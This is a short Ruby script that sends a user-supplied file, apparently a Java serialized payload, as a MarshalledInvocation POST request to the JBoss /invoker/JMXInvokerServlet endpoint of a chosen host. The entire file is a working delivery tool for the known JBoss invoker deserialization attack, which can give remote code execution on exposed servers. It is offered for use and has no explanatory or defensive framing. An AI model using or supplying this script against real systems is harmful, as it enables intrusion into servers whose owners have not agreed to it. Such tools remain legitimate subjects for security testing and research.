#!/usr/bin/env ruby

require 'net/https'
require 'optparse'

class JmxInvokerServlet

  def initialize
    @opts = parseopts(ARGV)
    send
  end

  def parseopts(args)
    options = {
      :host => "localhost",
      :port => 8080,
      :ssl => false,
      :invoker => "/invoker/JMXInvokerServlet",
      :debug => false
    }
    OptionParser.new do |opts|
      opts.banner = "Usage: #{__FILE__} [options] <payload>"
      opts.separator ""
      opts.on("-n", "--host HOST", "Host (default: #{options[:host]})") do |h|
        options[:host] = h
      end
      opts.on("-p", "--port PORT", "Port (default: #{options[:port]})") do |p|
        options[:port] = p.to_i
      end
      opts.on("-s", "--ssl", "Use SSL (default: #{options[:ssl]})") do |ssl|
        options[:ssl] = true
      end
      opts.on("-i", "--invoker INVOKER", "Invoker (default: #{options[:invoker]})") do |i|
        options[:invoker] = i
      end
      opts.on("-d", "--debug", "Show debug information") do |d|
        options[:debug] = true
      end
      opts.on("-h", "--help", "Print this help") do
        puts opts
        exit
      end
    end.parse!
    if ARGV[0]
      data = File.open(ARGV[0]).read()
      options[:data] = data
      options
    else
      puts "Please provide a file with the payload"
      exit 1
    end
  end

  def send
    header = {
      'ContentType' => 'application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation',
      'Accept-Encoding' => 'x-gzip,x-deflate,gzip,deflate',
      'User-Agent' => 'Java/1.6.0_06',
      'Accept' => 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
      'Connection' => 'keep-alive',
      'Content-type' => 'application/x-www-form-urlencoded'
    }
    http = Net::HTTP.new(@opts[:host], @opts[:port])
    if @opts[:ssl]
      http.use_ssl = true
    end
    puts "[ok] Sending invocation to #{@opts[:host]}:#{@opts[:port]}#{@opts[:invoker]}"
    begin
      res = http.post(@opts[:invoker], @opts[:data], header)
      puts "[ok] Operation successful."
      puts res.body if @opts[:debug]
    rescue
      puts "[er] An error occurred, please try again."
    end
  end

end

if __FILE__ == $0
  JmxInvokerServlet.new
end
